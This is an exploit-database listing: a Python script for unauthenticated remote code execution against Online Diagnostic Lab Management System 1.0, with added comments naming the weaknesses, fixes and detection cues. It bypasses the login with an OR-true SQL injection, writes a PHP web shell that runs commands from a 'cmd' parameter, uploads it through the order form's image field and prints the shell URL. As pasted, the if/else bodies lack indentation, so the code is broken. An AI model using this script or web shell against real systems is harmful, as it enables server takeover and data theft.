## https://sploitus.com/exploit?id=PACKETSTORM:168498
# Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)  
# Google Dork: N/A  
# Date: 2022-9-23  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
# Authentication Required: bypass login with sql injection   
  
#/usr/bin/python3   
  
import requests   
import os  
import sys  
import time  
import random  
  
# Proof-of-concept flow: (1) bypass the login form with an SQL-injection
# payload, (2) upload a PHP file through the order form's image field,
# (3) print where the uploaded file is served from. Each step is annotated
# below with the weakness it relies on and the defender-side fix/detection.

# clean screen
# Both clear commands run unconditionally; `cls` exists on Windows and `clear`
# on POSIX shells, so one of the two fails on any given platform (the return
# code is ignored).
os.system("cls")
os.system("clear")

logo = '''  
##################################################################  
# #   
# Exploit Script ( Online Diagnostic Lab Management System ) #  
# #  
##################################################################  
'''
print(logo)

# Base URL of the target instance, taken verbatim from the operator and used
# as a prefix for every request below. input() already returns str, so the
# str() wrapper is redundant; no scheme/host validation is performed.
url = str(input("Enter website url : "))
# Weakness 1: the username value is an OR-true injection with a trailing SQL
# comment, which presumably short-circuits the password check in login.php.
# Fix: parameterised/prepared statements in login.php. Detection: quote and
# comment sequences (`'`, `--`) in POSTed username fields.
username = ("' OR 1=1-- -")
password = ("test")

# One session so the login cookie is reused for the upload request.
req = requests.Session()

target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}

website = req.post(target,data=data)
# The PHP one-liner is written to rev.php in the current working directory and
# re-opened later for upload; this "w" handle is closed, the "rb" handle opened
# in the multipart dict below never is.
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()

# Randomised upload name (shadows the builtin hash()). `random` is not a
# CSPRNG, which is irrelevant here since the value is only a filename.
hash = random.getrandbits(128)
name_file = str(hash)+".php"
# Login success is inferred from a marker string in the response body.
# NOTE(review): in this listing the if/else bodies (through the final print)
# have lost their indentation, so the script does not parse as pasted.
if "Login Successfully" in website.text:

print("[+] Login Successfully")
# Weakness 2: the PoC relies on createOrder.php's productImage field accepting
# a .php upload and storing it under the web-served assets/myimages/ path
# (see the URLs printed below). Fix: server-side extension/MIME allowlist,
# store uploads outside the web root or disable script execution in that
# directory. Detection: new .php files under assets/myimages and requests to
# that directory carrying a cmd= query parameter.
website_1 = url+"/diagnostic/php_action/createOrder.php"

# Multipart body: every order field is sent empty as a (None, value) tuple;
# only productImage carries a file part.
upload_file = {
"orderDate": (None,""),
"clientName": (None,""),
"clientContact" : (None,""),
"productName[]" : (None,""),
"rateValue[]" : (None,""),
"quantity[]" : (None,""),
"totalValue[]" : (None,""),
"subTotalValue" : (None,""),
"totalAmountValue" : (None,""),
"discount" : (None,""),
"grandTotalValue" : (None,""),
"gstn" : (None,""),
"vatValue" : (None,""),
"paid" : (None,""),
"dueValue" : (None,""),
"paymentType" : (None,""),
"paymentStatus" : (None,""),
"paymentPlace" : (None,""),
"productImage" : (name_file,open("rev.php","rb"))
}

# The upload response is never inspected: the two messages below print
# regardless of whether createOrder.php accepted or rejected the file.
up = req.post(website_1,files=upload_file)
print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
print("[-] Check username or password")